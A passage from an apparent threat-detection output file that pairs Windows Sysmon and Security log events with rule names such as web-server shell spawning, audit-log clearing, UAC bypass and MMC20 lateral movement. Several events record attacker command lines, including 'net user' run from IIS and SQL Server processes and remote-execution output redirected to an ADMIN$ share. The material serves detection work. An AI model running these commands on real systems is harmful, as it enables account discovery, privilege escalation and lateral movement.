-NoProfile","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-65A9-5CC7-0000-00104E5C2400","ParentProcessId":3376,"ProcessGuid":"365ABB72-65AA-5CC7-0000-00104D882400","ProcessId":2116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-29 
20:59:22.128"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":8050,"Execution_attributes":{"ProcessID":1896,"ThreadID":1820},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-29T20:59:22.144046Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"PC01.example.corp","Correlation":null,"EventID":1102,"EventRecordID":432901,"Execution_attributes":{"ProcessID":856,"ThreadID":2200},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2019-03-18T11:06:25.485214Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"EXAMPLE","SubjectLogonId":"0x18a7875","SubjectUserName":"user01","SubjectUserSid":"S-1-5-21-1587066498-1489273250-1035260531-1106"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog","xmlns:auto-ns3":"http://schemas.microsoft.com/win/2004/08/events"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MSHTA Spwaned by SVCHOST"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\System32\\mshta.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.9600.16428 
(winblue_gdr.131013-1700)","Hashes":"SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-19E0-5CDA-0000-0020CE701000","LogonId":"0x1070ce","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-965E-5CDA-0000-0010AF760000","ParentProcessId":596,"ProcessGuid":"365ABB72-19E0-5CDA-0000-001006711000","ProcessId":1932,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 01:29:04.293"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17589,"Execution_attributes":{"ProcessID":2000,"ThreadID":1960},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-14T01:29:04.306885Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Shells Spawned by Web Servers"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"DefaultAppPool\" -v \"v2.0\" -l \"webengine4.dll\" -a \\\\.\\pipe\\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h \"C:\\inetpub\\temp\\apppools\\DefaultAppPool\\DefaultAppPool.config\" -w \"\" -m 0 -t 20","ParentImage":"C:\\Windows\\System32\\inetsrv\\w3wp.exe","ParentProcessGuid":"365ABB72-49D6-5CE7-0000-001020A7A700","ParentProcessId":2580,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ProcessId":2404,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.112"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1044,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.112486Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"net user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"\"c:\\windows\\system32\\cmd.exe\" /c net user","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-0010EE9DAC00","ParentProcessId":2404,"ProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ProcessId":788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.152"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1046,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.182587Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\net1 user","Company":"Microsoft Corporation","CurrentDirectory":"c:\\windows\\system32\\inetsrv\\","Description":"Net Command","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=387577C0B3B89FEFCE983DC42CFF456A33287035,MD5=2041012726EF7C95ED51C15C56545A7F,SHA256=A0BE13AC9443ACC6D2EEA474CC82A727BDB7E1009F573DBA34D269F9A6AAA347,IMPHASH=FB687F4F7ACC1F20B5382A2C932A259E","Image":"C:\\Windows\\System32\\net1.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-45C7-5CE7-0000-002092F99C00","LogonId":"0x9cf992","ParentCommandLine":"net user","ParentImage":"C:\\Windows\\System32\\net.exe","ParentProcessGuid":"365ABB72-4A01-5CE7-0000-00102DA1AC00","ParentProcessId":788,"ProcessGuid":"365ABB72-4A01-5CE7-0000-0010B6A2AC00","ProcessId":712,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IIS APPPOOL\\DefaultAppPool","UtcTime":"2019-05-24 01:33:53.162"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1047,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-24T01:33:53.192601Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\windows\\system32\\notepad.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\a","UtcTime":"2020-07-09 
22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311354,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591137Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:17.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311355,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:17.591169Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"a","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:31.172"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311361,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:31.218022Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cmd.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\b","UtcTime":"2020-07-09 
22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311367,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590589Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"ba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:00:45.579"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311368,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:00:45.590736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"powershell.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\c","UtcTime":"2020-07-09 22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311375,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.900433Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"cba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-86FC-5F07-0000-00101E4B0700","ProcessId":2356,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 
22:01:03.893"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311376,"Execution_attributes":{"ProcessID":3280,"ThreadID":1044},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:01:03.902259Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"eventvwr\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\d","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311387,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185045Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"dcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-09 22:06:20.180"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311388,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-09T22:06:20.185107Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"\\\\tsclient\\c\\temp\\stack\\a.exe\\1","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\e","UtcTime":"2020-07-10 
10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311413,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672486Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"edcba","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-94CF-5F07-0000-0010BD590400","ProcessId":3248,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU\\MRUList","UtcTime":"2020-07-10 10:20:37.668"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":311414,"Execution_attributes":{"ProcessID":3148,"ThreadID":4088},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-10T10:20:37.672499Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Shells Spawn by SQL Server"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c set > c:\\users\\\\public\\netstat.txt","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CE3B-5DBE-0000-00201ED50100","LogonId":"0x1d51e","ParentCommandLine":"\"c:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe\" -sSQLEXPRESS","ParentImage":"C:\\Program Files\\Microsoft SQL Server\\MSSQL10.SQLEXPRESS\\MSSQL\\Binn\\sqlservr.exe","ParentProcessGuid":"747F3D96-CE42-5DBE-0000-0010EE430200","ParentProcessId":3936,"ProcessGuid":"747F3D96-DB7C-5DBE-0000-0010CF6B9502","ProcessId":5004,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"MSEDGEWIN10\\sqlsvc","UtcTime":"2019-11-03 13:51:56.380"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":56509,"Execution_attributes":{"ProcessID":3180,"ThreadID":4224},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-11-03T13:51:58.263043Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC20 Lateral Movement"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft Management Console","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1","Image":"C:\\Windows\\System32\\mmc.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k DcomLaunch","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-2586-5CC9-0000-001087700000","ParentProcessId":612,"ProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ProcessId":3572,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:11.856"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9832,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:11.856089Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B180-5CC8-0000-00102BB71E00","ProcessId":1504,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 20:35:12.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":9833,"Execution_attributes":{"ProcessID":1964,"ThreadID":1664},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T20:35:12.449839Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656511.61 2>&1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 
(win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-B17F-5CC8-0000-0020C6A31E00","LogonId":"0x1ea3c6","ParentCommandLine":"C:\\Windows\\system32\\mmc.exe -Embedding","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"365ABB72-B17F-5CC8-0000-001082A51E00","ParentProcessId":3572,"ProcessGuid":"365ABB72-B181-5CC8-0000-0010ADBF1E00","ProcessId":3372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 